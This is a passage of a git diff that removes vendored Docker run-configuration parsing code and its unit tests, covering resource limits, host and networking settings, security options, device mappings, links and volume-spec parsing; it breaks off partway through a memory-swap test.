healthConfig = &container.HealthConfig{ - Test: probe, - Interval: copts.healthInterval, - Timeout: copts.healthTimeout, - Retries: copts.healthRetries, - } - } - - resources := container.Resources{ - CgroupParent: copts.cgroupParent, - Memory: memory, - MemoryReservation: memoryReservation, - MemorySwap: memorySwap, - MemorySwappiness: &copts.swappiness, - KernelMemory: kernelMemory, - OomKillDisable: &copts.oomKillDisable, - NanoCPUs: copts.cpus.Value(), - CPUCount: copts.cpuCount, - CPUPercent: copts.cpuPercent, - CPUShares: copts.cpuShares, - CPUPeriod: copts.cpuPeriod, - CpusetCpus: copts.cpusetCpus, - CpusetMems: copts.cpusetMems, - CPUQuota: copts.cpuQuota, - CPURealtimePeriod: copts.cpuRealtimePeriod, - CPURealtimeRuntime: copts.cpuRealtimeRuntime, - PidsLimit: copts.pidsLimit, - BlkioWeight: copts.blkioWeight, - BlkioWeightDevice: copts.blkioWeightDevice.GetList(), - BlkioDeviceReadBps: copts.deviceReadBps.GetList(), - BlkioDeviceWriteBps: copts.deviceWriteBps.GetList(), - BlkioDeviceReadIOps: copts.deviceReadIOps.GetList(), - BlkioDeviceWriteIOps: copts.deviceWriteIOps.GetList(), - IOMaximumIOps: copts.ioMaxIOps, - IOMaximumBandwidth: uint64(maxIOBandwidth), - Ulimits: copts.ulimits.GetList(), - Devices: deviceMappings, - } - - config := &container.Config{ - Hostname: copts.hostname, - ExposedPorts: ports, - User: copts.user, - Tty: copts.tty, - // TODO: deprecated, it comes from -n, --networking - // it's still needed internally to set the network to disabled - // if e.g. bridge is none in daemon opts, and in inspect - NetworkDisabled: false, - OpenStdin: copts.stdin, - AttachStdin: attachStdin, - AttachStdout: attachStdout, - AttachStderr: attachStderr, - Env: envVariables, - Cmd: runCmd, - Image: copts.Image, - Volumes: volumes, - MacAddress: copts.macAddress, - Entrypoint: entrypoint, - WorkingDir: copts.workingDir, - Labels: ConvertKVStringsToMap(labels), - Healthcheck: healthConfig, - } - if flags.Changed("stop-signal") { - config.StopSignal = copts.stopSignal - } - if flags.Changed("stop-timeout") { - config.StopTimeout = &copts.stopTimeout - } - - hostConfig := &container.HostConfig{ - Binds: binds, - ContainerIDFile: copts.containerIDFile, - OomScoreAdj: copts.oomScoreAdj, - AutoRemove: copts.autoRemove, - Privileged: copts.privileged, - PortBindings: portBindings, - Links: copts.links.GetAll(), - PublishAllPorts: copts.publishAll, - // Make sure the dns fields are never nil. - // New containers don't ever have those fields nil, - // but pre created containers can still have those nil values. - // See https://github.com/docker/docker/pull/17779 - // for a more detailed explanation on why we don't want that. - DNS: copts.dns.GetAllOrEmpty(), - DNSSearch: copts.dnsSearch.GetAllOrEmpty(), - DNSOptions: copts.dnsOptions.GetAllOrEmpty(), - ExtraHosts: copts.extraHosts.GetAll(), - VolumesFrom: copts.volumesFrom.GetAll(), - NetworkMode: container.NetworkMode(copts.netMode), - IpcMode: ipcMode, - PidMode: pidMode, - UTSMode: utsMode, - UsernsMode: usernsMode, - CapAdd: strslice.StrSlice(copts.capAdd.GetAll()), - CapDrop: strslice.StrSlice(copts.capDrop.GetAll()), - GroupAdd: copts.groupAdd.GetAll(), - RestartPolicy: restartPolicy, - SecurityOpt: securityOpts, - StorageOpt: storageOpts, - ReadonlyRootfs: copts.readonlyRootfs, - LogConfig: container.LogConfig{Type: copts.loggingDriver, Config: loggingOpts}, - VolumeDriver: copts.volumeDriver, - Isolation: container.Isolation(copts.isolation), - ShmSize: shmSize, - Resources: resources, - Tmpfs: tmpfs, - Sysctls: copts.sysctls.GetAll(), - Runtime: copts.runtime, - } - - // only set this value if the user provided the flag, else it should default to nil - if flags.Changed("init") { - hostConfig.Init = &copts.init - } - - // When allocating stdin in attached mode, close stdin at client disconnect - if config.OpenStdin && config.AttachStdin { - config.StdinOnce = true - } - - networkingConfig := &networktypes.NetworkingConfig{ - EndpointsConfig: make(map[string]*networktypes.EndpointSettings), - } - - if copts.ipv4Address != "" || copts.ipv6Address != "" || copts.linkLocalIPs.Len() > 0 { - epConfig := &networktypes.EndpointSettings{} - networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig - - epConfig.IPAMConfig = &networktypes.EndpointIPAMConfig{ - IPv4Address: copts.ipv4Address, - IPv6Address: copts.ipv6Address, - } - - if copts.linkLocalIPs.Len() > 0 { - epConfig.IPAMConfig.LinkLocalIPs = make([]string, copts.linkLocalIPs.Len()) - copy(epConfig.IPAMConfig.LinkLocalIPs, copts.linkLocalIPs.GetAll()) - } - } - - if hostConfig.NetworkMode.IsUserDefined() && len(hostConfig.Links) > 0 { - epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] - if epConfig == nil { - epConfig = &networktypes.EndpointSettings{} - } - epConfig.Links = make([]string, len(hostConfig.Links)) - copy(epConfig.Links, hostConfig.Links) - networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig - } - - if copts.aliases.Len() > 0 { - epConfig := networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] - if epConfig == nil { - epConfig = &networktypes.EndpointSettings{} - } - epConfig.Aliases = make([]string, copts.aliases.Len()) - copy(epConfig.Aliases, copts.aliases.GetAll()) - networkingConfig.EndpointsConfig[string(hostConfig.NetworkMode)] = epConfig - } - - return config, hostConfig, networkingConfig, nil -} - -// ReadKVStrings reads a file of line terminated key=value pairs, and overrides any keys -// present in the file with additional pairs specified in the override parameter -func ReadKVStrings(files []string, override []string) ([]string, error) { - envVariables := []string{} - for _, ef := range files { - parsedVars, err := ParseEnvFile(ef) - if err != nil { - return nil, err - } - envVariables = append(envVariables, parsedVars...) - } - // parse the '-e' and '--env' after, to allow override - envVariables = append(envVariables, override...) - - return envVariables, nil -} - // ConvertKVStringsToMap converts ["key=value"] to {"key":"value"} func ConvertKVStringsToMap(values []string) map[string]string { result := make(map[string]string, len(values)) @@ -704,292 +18,3 @@ func ConvertKVStringsToMap(values []string) map[string]string { return result } - -// ConvertKVStringsToMapWithNil converts ["key=value"] to {"key":"value"} -// but set unset keys to nil - meaning the ones with no "=" in them. -// We use this in cases where we need to distinguish between -// FOO= and FOO -// where the latter case just means FOO was mentioned but not given a value -func ConvertKVStringsToMapWithNil(values []string) map[string]*string { - result := make(map[string]*string, len(values)) - for _, value := range values { - kv := strings.SplitN(value, "=", 2) - if len(kv) == 1 { - result[kv[0]] = nil - } else { - result[kv[0]] = &kv[1] - } - } - - return result -} - -func parseLoggingOpts(loggingDriver string, loggingOpts []string) (map[string]string, error) { - loggingOptsMap := ConvertKVStringsToMap(loggingOpts) - if loggingDriver == "none" && len(loggingOpts) > 0 { - return map[string]string{}, fmt.Errorf("invalid logging opts for driver %s", loggingDriver) - } - return loggingOptsMap, nil -} - -// takes a local seccomp daemon, reads the file contents for sending to the daemon -func parseSecurityOpts(securityOpts []string) ([]string, error) { - for key, opt := range securityOpts { - con := strings.SplitN(opt, "=", 2) - if len(con) == 1 && con[0] != "no-new-privileges" { - if strings.Contains(opt, ":") { - con = strings.SplitN(opt, ":", 2) - } else { - return securityOpts, fmt.Errorf("Invalid --security-opt: %q", opt) - } - } - if con[0] == "seccomp" && con[1] != "unconfined" { - f, err := ioutil.ReadFile(con[1]) - if err != nil { - return securityOpts, fmt.Errorf("opening seccomp profile (%s) failed: %v", con[1], err) - } - b := bytes.NewBuffer(nil) - if err := json.Compact(b, f); err != nil { - return securityOpts, fmt.Errorf("compacting json for seccomp profile (%s) failed: %v", con[1], err) - } - securityOpts[key] = fmt.Sprintf("seccomp=%s", b.Bytes()) - } - } - - return securityOpts, nil -} - -// parses storage options per container into a map -func parseStorageOpts(storageOpts []string) (map[string]string, error) { - m := make(map[string]string) - for _, option := range storageOpts { - if strings.Contains(option, "=") { - opt := strings.SplitN(option, "=", 2) - m[opt[0]] = opt[1] - } else { - return nil, fmt.Errorf("invalid storage option") - } - } - return m, nil -} - -// ParseRestartPolicy returns the parsed policy or an error indicating what is incorrect -func ParseRestartPolicy(policy string) (container.RestartPolicy, error) { - p := container.RestartPolicy{} - - if policy == "" { - return p, nil - } - - parts := strings.Split(policy, ":") - - if len(parts) > 2 { - return p, fmt.Errorf("invalid restart policy format") - } - if len(parts) == 2 { - count, err := strconv.Atoi(parts[1]) - if err != nil { - return p, fmt.Errorf("maximum retry count must be an integer") - } - - p.MaximumRetryCount = count - } - - p.Name = parts[0] - - return p, nil -} - -// ParseDevice parses a device mapping string to a container.DeviceMapping struct -func ParseDevice(device string) (container.DeviceMapping, error) { - src := "" - dst := "" - permissions := "rwm" - arr := strings.Split(device, ":") - switch len(arr) { - case 3: - permissions = arr[2] - fallthrough - case 2: - if ValidDeviceMode(arr[1]) { - permissions = arr[1] - } else { - dst = arr[1] - } - fallthrough - case 1: - src = arr[0] - default: - return container.DeviceMapping{}, fmt.Errorf("invalid device specification: %s", device) - } - - if dst == "" { - dst = src - } - - deviceMapping := container.DeviceMapping{ - PathOnHost: src, - PathInContainer: dst, - CgroupPermissions: permissions, - } - return deviceMapping, nil -} - -// ParseLink parses and validates the specified string as a link format (name:alias) -func ParseLink(val string) (string, string, error) { - if val == "" { - return "", "", fmt.Errorf("empty string specified for links") - } - arr := strings.Split(val, ":") - if len(arr) > 2 { - return "", "", fmt.Errorf("bad format for links: %s", val) - } - if len(arr) == 1 { - return val, val, nil - } - // This is kept because we can actually get a HostConfig with links - // from an already created container and the format is not `foo:bar` - // but `/foo:/c1/bar` - if strings.HasPrefix(arr[0], "/") { - _, alias := path.Split(arr[1]) - return arr[0][1:], alias, nil - } - return arr[0], arr[1], nil -} - -// ValidateLink validates that the specified string has a valid link format (containerName:alias). -func ValidateLink(val string) (string, error) { - if _, _, err := ParseLink(val); err != nil { - return val, err - } - return val, nil -} - -// ValidDeviceMode checks if the mode for device is valid or not. -// Valid mode is a composition of r (read), w (write), and m (mknod). -func ValidDeviceMode(mode string) bool { - var legalDeviceMode = map[rune]bool{ - 'r': true, - 'w': true, - 'm': true, - } - if mode == "" { - return false - } - for _, c := range mode { - if !legalDeviceMode[c] { - return false - } - legalDeviceMode[c] = false - } - return true -} - -// ValidateDevice validates a path for devices -// It will make sure 'val' is in the form: -// [host-dir:]container-path[:mode] -// It also validates the device mode. -func ValidateDevice(val string) (string, error) { - return validatePath(val, ValidDeviceMode) -} - -func validatePath(val string, validator func(string) bool) (string, error) { - var containerPath string - var mode string - - if strings.Count(val, ":") > 2 { - return val, fmt.Errorf("bad format for path: %s", val) - } - - split := strings.SplitN(val, ":", 3) - if split[0] == "" { - return val, fmt.Errorf("bad format for path: %s", val) - } - switch len(split) { - case 1: - containerPath = split[0] - val = path.Clean(containerPath) - case 2: - if isValid := validator(split[1]); isValid { - containerPath = split[0] - mode = split[1] - val = fmt.Sprintf("%s:%s", path.Clean(containerPath), mode) - } else { - containerPath = split[1] - val = fmt.Sprintf("%s:%s", split[0], path.Clean(containerPath)) - } - case 3: - containerPath = split[1] - mode = split[2] - if isValid := validator(split[2]); !isValid { - return val, fmt.Errorf("bad mode specified: %s", mode) - } - val = fmt.Sprintf("%s:%s:%s", split[0], containerPath, mode) - } - - if !path.IsAbs(containerPath) { - return val, fmt.Errorf("%s is not an absolute path", containerPath) - } - return val, nil -} - -// volumeSplitN splits raw into a maximum of n parts, separated by a separator colon. -// A separator colon is the last `:` character in the regex `[:\\]?[a-zA-Z]:` (note `\\` is `\` escaped). -// In Windows driver letter appears in two situations: -// a. `^[a-zA-Z]:` (A colon followed by `^[a-zA-Z]:` is OK as colon is the separator in volume option) -// b. A string in the format like `\\?\C:\Windows\...` (UNC). -// Therefore, a driver letter can only follow either a `:` or `\\` -// This allows to correctly split strings such as `C:\foo:D:\:rw` or `/tmp/q:/foo`. -func volumeSplitN(raw string, n int) []string { - var array []string - if len(raw) == 0 || raw[0] == ':' { - // invalid - return nil - } - // numberOfParts counts the number of parts separated by a separator colon - numberOfParts := 0 - // left represents the left-most cursor in raw, updated at every `:` character considered as a separator. - left := 0 - // right represents the right-most cursor in raw incremented with the loop. Note this - // starts at index 1 as index 0 is already handle above as a special case. - for right := 1; right < len(raw); right++ { - // stop parsing if reached maximum number of parts - if n >= 0 && numberOfParts >= n { - break - } - if raw[right] != ':' { - continue - } - potentialDriveLetter := raw[right-1] - if (potentialDriveLetter >= 'A' && potentialDriveLetter <= 'Z') || (potentialDriveLetter >= 'a' && potentialDriveLetter <= 'z') { - if right > 1 { - beforePotentialDriveLetter := raw[right-2] - // Only `:` or `\\` are checked (`/` could fall into the case of `/tmp/q:/foo`) - if beforePotentialDriveLetter != ':' && beforePotentialDriveLetter != '\\' { - // e.g. `C:` is not preceded by any delimiter, therefore it was not a drive letter but a path ending with `C:`. - array = append(array, raw[left:right]) - left = right + 1 - numberOfParts++ - } - // else, `C:` is considered as a drive letter and not as a delimiter, so we continue parsing. - } - // if right == 1, then `C:` is the beginning of the raw string, therefore `:` is again not considered a delimiter and we continue parsing. - } else { - // if `:` is not preceded by a potential drive letter, then consider it as a delimiter. - array = append(array, raw[left:right]) - left = right + 1 - numberOfParts++ - } - } - // need to take care of the last part - if left < len(raw) { - if n >= 0 && numberOfParts >= n { - // if the maximum number of parts is reached, just append the rest to the last part - // left-1 is at the last `:` that needs to be included since not considered a separator. - array[n-1] += raw[left-1:] - } else { - array = append(array, raw[left:]) - } - } - return array -} diff --git a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go b/vendor/github.com/docker/docker/runconfig/opts/parse_test.go deleted file mode 100644 index a1be379ae8..0000000000 --- a/vendor/github.com/docker/docker/runconfig/opts/parse_test.go +++ /dev/null @@ -1,894 +0,0 @@ -package opts - -import ( - "bytes" - "encoding/json" - "fmt" - "io/ioutil" - "os" - "runtime" - "strings" - "testing" - "time" - - "github.com/docker/docker/api/types/container" - networktypes "github.com/docker/docker/api/types/network" - "github.com/docker/docker/runconfig" - "github.com/docker/go-connections/nat" - "github.com/spf13/pflag" -) - -func parseRun(args []string) (*container.Config, *container.HostConfig, *networktypes.NetworkingConfig, error) { - flags := pflag.NewFlagSet("run", pflag.ContinueOnError) - flags.SetOutput(ioutil.Discard) - flags.Usage = nil - copts := AddFlags(flags) - if err := flags.Parse(args); err != nil { - return nil, nil, nil, err - } - return Parse(flags, copts) -} - -func parse(t *testing.T, args string) (*container.Config, *container.HostConfig, error) { - config, hostConfig, _, err := parseRun(strings.Split(args+" ubuntu bash", " ")) - return config, hostConfig, err -} - -func mustParse(t *testing.T, args string) (*container.Config, *container.HostConfig) { - config, hostConfig, err := parse(t, args) - if err != nil { - t.Fatal(err) - } - return config, hostConfig -} - -func TestParseRunLinks(t *testing.T) { - if _, hostConfig := mustParse(t, "--link a:b"); len(hostConfig.Links) == 0 || hostConfig.Links[0] != "a:b" { - t.Fatalf("Error parsing links. Expected []string{\"a:b\"}, received: %v", hostConfig.Links) - } - if _, hostConfig := mustParse(t, "--link a:b --link c:d"); len(hostConfig.Links) < 2 || hostConfig.Links[0] != "a:b" || hostConfig.Links[1] != "c:d" { - t.Fatalf("Error parsing links. Expected []string{\"a:b\", \"c:d\"}, received: %v", hostConfig.Links) - } - if _, hostConfig := mustParse(t, ""); len(hostConfig.Links) != 0 { - t.Fatalf("Error parsing links. No link expected, received: %v", hostConfig.Links) - } -} - -func TestParseRunAttach(t *testing.T) { - if config, _ := mustParse(t, "-a stdin"); !config.AttachStdin || config.AttachStdout || config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect only Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - if config, _ := mustParse(t, "-a stdin -a stdout"); !config.AttachStdin || !config.AttachStdout || config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect only Stdin and Stdout enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - if config, _ := mustParse(t, "-a stdin -a stdout -a stderr"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect all attach enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - if config, _ := mustParse(t, ""); config.AttachStdin || !config.AttachStdout || !config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect Stdin disabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - if config, _ := mustParse(t, "-i"); !config.AttachStdin || !config.AttachStdout || !config.AttachStderr { - t.Fatalf("Error parsing attach flags. Expect Stdin enabled. Received: in: %v, out: %v, err: %v", config.AttachStdin, config.AttachStdout, config.AttachStderr) - } - - if _, _, err := parse(t, "-a"); err == nil { - t.Fatalf("Error parsing attach flags, `-a` should be an error but is not") - } - if _, _, err := parse(t, "-a invalid"); err == nil { - t.Fatalf("Error parsing attach flags, `-a invalid` should be an error but is not") - } - if _, _, err := parse(t, "-a invalid -a stdout"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stdout -a invalid` should be an error but is not") - } - if _, _, err := parse(t, "-a stdout -a stderr -d"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stdout -a stderr -d` should be an error but is not") - } - if _, _, err := parse(t, "-a stdin -d"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stdin -d` should be an error but is not") - } - if _, _, err := parse(t, "-a stdout -d"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stdout -d` should be an error but is not") - } - if _, _, err := parse(t, "-a stderr -d"); err == nil { - t.Fatalf("Error parsing attach flags, `-a stderr -d` should be an error but is not") - } - if _, _, err := parse(t, "-d --rm"); err == nil { - t.Fatalf("Error parsing attach flags, `-d --rm` should be an error but is not") - } -} - -func TestParseRunVolumes(t *testing.T) { - - // A single volume - arr, tryit := setupPlatformVolume([]string{`/tmp`}, []string{`c:\tmp`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil { - t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds) - } else if _, exists := config.Volumes[arr[0]]; !exists { - t.Fatalf("Error parsing volume flags, %q is missing from volumes. Received %v", tryit, config.Volumes) - } - - // Two volumes - arr, tryit = setupPlatformVolume([]string{`/tmp`, `/var`}, []string{`c:\tmp`, `c:\var`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds != nil { - t.Fatalf("Error parsing volume flags, %q should not mount-bind anything. Received %v", tryit, hostConfig.Binds) - } else if _, exists := config.Volumes[arr[0]]; !exists { - t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[0], config.Volumes) - } else if _, exists := config.Volumes[arr[1]]; !exists { - t.Fatalf("Error parsing volume flags, %s is missing from volumes. Received %v", arr[1], config.Volumes) - } - - // A single bind-mount - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || hostConfig.Binds[0] != arr[0] { - t.Fatalf("Error parsing volume flags, %q should mount-bind the path before the colon into the path after the colon. Received %v %v", arr[0], hostConfig.Binds, config.Volumes) - } - - // Two bind-mounts. - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/hostVar:/containerVar`}, []string{os.Getenv("ProgramData") + `:c:\ContainerPD`, os.Getenv("TEMP") + `:c:\containerTmp`}) - if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { - t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) - } - - // Two bind-mounts, first read-only, second read-write. - // TODO Windows: The Windows version uses read-write as that's the only mode it supports. Can change this post TP4 - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro`, `/hostVar:/containerVar:rw`}, []string{os.Getenv("TEMP") + `:c:\containerTmp:rw`, os.Getenv("ProgramData") + `:c:\ContainerPD:rw`}) - if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { - t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) - } - - // Similar to previous test but with alternate modes which are only supported by Linux - if runtime.GOOS != "windows" { - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:ro,Z`, `/hostVar:/containerVar:rw,Z`}, []string{}) - if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { - t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) - } - - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp:Z`, `/hostVar:/containerVar:z`}, []string{}) - if _, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || compareRandomizedStrings(hostConfig.Binds[0], hostConfig.Binds[1], arr[0], arr[1]) != nil { - t.Fatalf("Error parsing volume flags, `%s and %s` did not mount-bind correctly. Received %v", arr[0], arr[1], hostConfig.Binds) - } - } - - // One bind mount and one volume - arr, tryit = setupPlatformVolume([]string{`/hostTmp:/containerTmp`, `/containerVar`}, []string{os.Getenv("TEMP") + `:c:\containerTmp`, `c:\containerTmp`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] { - t.Fatalf("Error parsing volume flags, %s and %s should only one and only one bind mount %s. Received %s", arr[0], arr[1], arr[0], hostConfig.Binds) - } else if _, exists := config.Volumes[arr[1]]; !exists { - t.Fatalf("Error parsing volume flags %s and %s. %s is missing from volumes. Received %v", arr[0], arr[1], arr[1], config.Volumes) - } - - // Root to non-c: drive letter (Windows specific) - if runtime.GOOS == "windows" { - arr, tryit = setupPlatformVolume([]string{}, []string{os.Getenv("SystemDrive") + `\:d:`}) - if config, hostConfig := mustParse(t, tryit); hostConfig.Binds == nil || len(hostConfig.Binds) > 1 || hostConfig.Binds[0] != arr[0] || len(config.Volumes) != 0 { - t.Fatalf("Error parsing %s. Should have a single bind mount and no volumes", arr[0]) - } - } - -} - -// This tests the cases for binds which are generated through -// DecodeContainerConfig rather than Parse() -func TestDecodeContainerConfigVolumes(t *testing.T) { - - // Root to root - bindsOrVols, _ := setupPlatformVolume([]string{`/:/`}, []string{os.Getenv("SystemDrive") + `\:c:\`}) - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // No destination path - bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:`}, []string{os.Getenv("TEMP") + `\:`}) - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // // No destination path or mode - bindsOrVols, _ = setupPlatformVolume([]string{`/tmp::`}, []string{os.Getenv("TEMP") + `\::`}) - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // A whole lot of nothing - bindsOrVols = []string{`:`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // A whole lot of nothing with no mode - bindsOrVols = []string{`::`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // Too much including an invalid mode - wTmp := os.Getenv("TEMP") - bindsOrVols, _ = setupPlatformVolume([]string{`/tmp:/tmp:/tmp:/tmp`}, []string{wTmp + ":" + wTmp + ":" + wTmp + ":" + wTmp}) - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // Windows specific error tests - if runtime.GOOS == "windows" { - // Volume which does not include a drive letter - bindsOrVols = []string{`\tmp`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // Root to C-Drive - bindsOrVols = []string{os.Getenv("SystemDrive") + `\:c:`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // Container path that does not include a drive letter - bindsOrVols = []string{`c:\windows:\somewhere`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - } - - // Linux-specific error tests - if runtime.GOOS != "windows" { - // Just root - bindsOrVols = []string{`/`} - if _, _, err := callDecodeContainerConfig(nil, bindsOrVols); err == nil { - t.Fatalf("binds %v should have failed", bindsOrVols) - } - if _, _, err := callDecodeContainerConfig(bindsOrVols, nil); err == nil { - t.Fatalf("volume %v should have failed", bindsOrVols) - } - - // A single volume that looks like a bind mount passed in Volumes. - // This should be handled as a bind mount, not a volume. - vols := []string{`/foo:/bar`} - if config, hostConfig, err := callDecodeContainerConfig(vols, nil); err != nil { - t.Fatal("Volume /foo:/bar should have succeeded as a volume name") - } else if hostConfig.Binds != nil { - t.Fatalf("Error parsing volume flags, /foo:/bar should not mount-bind anything. Received %v", hostConfig.Binds) - } else if _, exists := config.Volumes[vols[0]]; !exists { - t.Fatalf("Error parsing volume flags, /foo:/bar is missing from volumes. Received %v", config.Volumes) - } - - } -} - -// callDecodeContainerConfig is a utility function used by TestDecodeContainerConfigVolumes -// to call DecodeContainerConfig. It effectively does what a client would -// do when calling the daemon by constructing a JSON stream of a -// ContainerConfigWrapper which is populated by the set of volume specs -// passed into it. It returns a config and a hostconfig which can be -// validated to ensure DecodeContainerConfig has manipulated the structures -// correctly. -func callDecodeContainerConfig(volumes []string, binds []string) (*container.Config, *container.HostConfig, error) { - var ( - b []byte - err error - c *container.Config - h *container.HostConfig - ) - w := runconfig.ContainerConfigWrapper{ - Config: &container.Config{ - Volumes: map[string]struct{}{}, - }, - HostConfig: &container.HostConfig{ - NetworkMode: "none", - Binds: binds, - }, - } - for _, v := range volumes { - w.Config.Volumes[v] = struct{}{} - } - if b, err = json.Marshal(w); err != nil { - return nil, nil, fmt.Errorf("Error on marshal %s", err.Error()) - } - c, h, _, err = runconfig.DecodeContainerConfig(bytes.NewReader(b)) - if err != nil { - return nil, nil, fmt.Errorf("Error parsing %s: %v", string(b), err) - } - if c == nil || h == nil { - return nil, nil, fmt.Errorf("Empty config or hostconfig") - } - - return c, h, err -} - -// check if (a == c && b == d) || (a == d && b == c) -// because maps are randomized -func compareRandomizedStrings(a, b, c, d string) error { - if a == c && b == d { - return nil - } - if a == d && b == c { - return nil - } - return fmt.Errorf("strings don't match") -} - -// setupPlatformVolume takes two arrays of volume specs - a Unix style -// spec and a Windows style spec. Depending on the platform being unit tested, -// it returns one of them, along with a volume string that would be passed -// on the docker CLI (eg -v /bar -v /foo). -func setupPlatformVolume(u []string, w []string) ([]string, string) { - var a []string - if runtime.GOOS == "windows" { - a = w - } else { - a = u - } - s := "" - for _, v := range a { - s = s + "-v " + v + " " - } - return a, s -} - -// Simple parse with MacAddress validation -func TestParseWithMacAddress(t *testing.T) { - invalidMacAddress := "--mac-address=invalidMacAddress" - validMacAddress := "--mac-address=92:d0:c6:0a:29:33" - if _, _, _, err := parseRun([]string{invalidMacAddress, "img", "cmd"}); err != nil && err.Error() != "invalidMacAddress is not a valid mac address" { - t.Fatalf("Expected an error with %v mac-address, got %v", invalidMacAddress, err) - } - if config, _ := mustParse(t, validMacAddress); config.MacAddress != "92:d0:c6:0a:29:33" { - t.Fatalf("Expected the config to have '92:d0:c6:0a:29:33' as MacAddress, got '%v'", config.MacAddress) - } -} - -func TestParseWithMemory(t *testing.T) { - invalidMemory := "--memory=invalid" - validMemory := "--memory=1G" - if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err != nil && err.Error() != "invalid size: 'invalid'" { - t.Fatalf("Expected an error with '%v' Memory, got '%v'", invalidMemory, err) - } - if _, hostconfig := mustParse(t, validMemory); hostconfig.Memory != 1073741824 { - t.Fatalf("Expected the config to have '1G' as Memory, got '%v'", hostconfig.Memory) - } -} - -func TestParseWithMemorySwap(t *testing.T) { - invalidMemory := "--memory-swap=invalid" - validMemory := "--memory-swap=1G" - anotherValidMemory := "--memory-swap=-1" - if _, _, _, err := parseRun([]string{invalidMemory, "img", "cmd"}); err == nil || err.Error() != "invalid size: 'invalid'" { - t.Fatalf("Expected an error with '%v' MemorySwap, got '%v'", invalidMemory, err) - } - if _, hostconfig := mustParse(t, validMemory); 